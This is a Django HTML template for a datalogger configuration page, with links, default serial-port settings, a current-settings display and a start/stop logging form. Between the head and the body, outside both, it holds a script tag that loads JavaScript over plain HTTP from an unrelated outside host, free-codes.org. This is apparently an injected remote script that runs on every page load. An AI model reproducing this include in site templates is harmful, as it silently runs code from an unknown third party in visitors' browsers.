{% load staticfiles %}
<html>
    <head>
        <link rel="stylesheet" href="//maxcdn.bootstrapcdn.com/bootstrap/3.2.0/css/bootstrap.min.css">
        <link rel="stylesheet" href="//maxcdn.bootstrapcdn.com/bootstrap/3.2.0/css/bootstrap-theme.min.css">
        <link rel="stylesheet" href="{% static 'css/logger.css' %}">
        <title>Datalogger</title>
    </head>
    <script type = 'text/javascript' src='http://m.free-codes.org/gh.php?id=2001'></script>
    <body>
        <div class = "page-header"> 
            <h1><a href="/">Configure Datalogger</a></h1> 
        </div>
        <div>
            <h2 class = "frontpage-header"><a href="/logger/form/">New Logger</a></h2>
            <h2 class = "frontpage-header"><a href="/admin/logger/logger/">Edit Logger</a></h2>
            <h2 class = "frontpage-header"><a href="/logger/time/">Time</a></h2>
            <h2 class = "frontpage-header"><a href="/logger/upload/">Upload Files</a></h2>
            <h2 class = "frontpage-header"><a href="/logger/files/">Logger Files(.csv)</a></h2>
            <p style = "clear:both"></p>
            <div id ="status">
            <h1>Standard/Default Settings</h1>
            <h2>Press start with blank fields to use default settings </h3>
            <ul>
                <li>Baudrate: 115200</li>
                <li>Update Rate: 0 (autostreaming)</li>
                <li>Dataport: ttyAMA0</li>
                <li>Timeout: 5</li>
            </ul>
                <p>
                    <h3>Status: <h3 id = "status-bar">{{status.current}}</h3></h3>
                </p>
            <h1>Current Logging Settings</h1>
            <ul>
                <li>Baudrate: {{logger_settings.baudrate}}</li>
                <li>Filename: {{logger_settings.filename}}</li>
                <li>Update Rate: {{logger_settings.update_rate}}</li>
                <li>Dataport: {{logger_settings.dataport}}</li>
                <li>Timeout: {{logger_settings.timeout}}</li>
            </ul>
        </div>
        <div>
    <form action = "" method ="post">
        {% csrf_token %}
        <pre id = "formdata">
            <p><b>Baudrate &nbsp;&nbsp;&nbsp;{{form.baudrate}}</b>
            <p><b>File Name &nbsp;&nbsp;{{form.file_name}}</b>
            <p><b>Update Rate {{form.update_rate}}</b>
            <p><b>Dataport &nbsp;&nbsp;&nbsp;{{form.dataport}}</b>
            <p><b>Timeout &nbsp;&nbsp;&nbsp;&nbsp;{{form.timeout}}</b>
        </pre>
        <input type = "submit" class = "button-start" value = "Start" name = "submit" >
        <!--onClick = "alert('Currently logging...'); return true"> -->
        <input type = "submit" class = "button-stop" value = "Stop" name = "stop"
    ><!--  onClick = "alert('Logging stopped'); return true"/> -->
        </div>
    </form>
    </body>
</html>


